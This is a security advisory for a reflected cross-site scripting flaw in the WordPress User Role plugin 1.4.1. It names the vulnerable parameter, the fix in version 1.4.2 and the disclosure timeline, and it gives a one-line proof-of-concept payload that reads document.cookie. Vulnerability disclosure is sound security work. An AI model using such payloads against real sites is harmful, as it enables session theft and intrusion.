WordPress User Role plugin version 1.4.1 suffers from a cross site scripting vulnerability.
fbc8ae9d4bf8b35fec5985f4353e4edf07c7ae595dee0a8d652bd3b7b3b0cab7
Plugin Name : User Role
Effected Version : 1.4.1 (and most probably lower version's if any)
Vulnerability : A3-Cross-Site Scripting (XSS)
Identified by : Madhu Akula
Technical Details
Minimum Level of Access Required : Administrator
PoC - (Proof of Concept) :
In the following field put the payload as below
http://localhost/wp-admin/admin.php?page=user-role.php&action=go_pro
bws_license_key = “><img src=x onerror=prompt(document.cookie);>
Vulnerable Parameter : bws_license_key
Type of XSS : Reflected
Fixed in : 1.4.2
http://wordpress.org/plugins/user-role/changelog/
Disclosure Timeline
Vendor Contacted : 2014-08-04
Plugin Status : Updated on 2014-08-07
Public Disclosure : October 3, 2015
CVE Number : Not assigned yet
Plugin Description :
The User Role plugin allows you to change wordpress role capabilities. It is a very useful tool when your site has a bunch of visitors or subscribers. The plugin has intuitive and convenient interface so all the site visitors can be easily sorted by roles with a couple of clicks.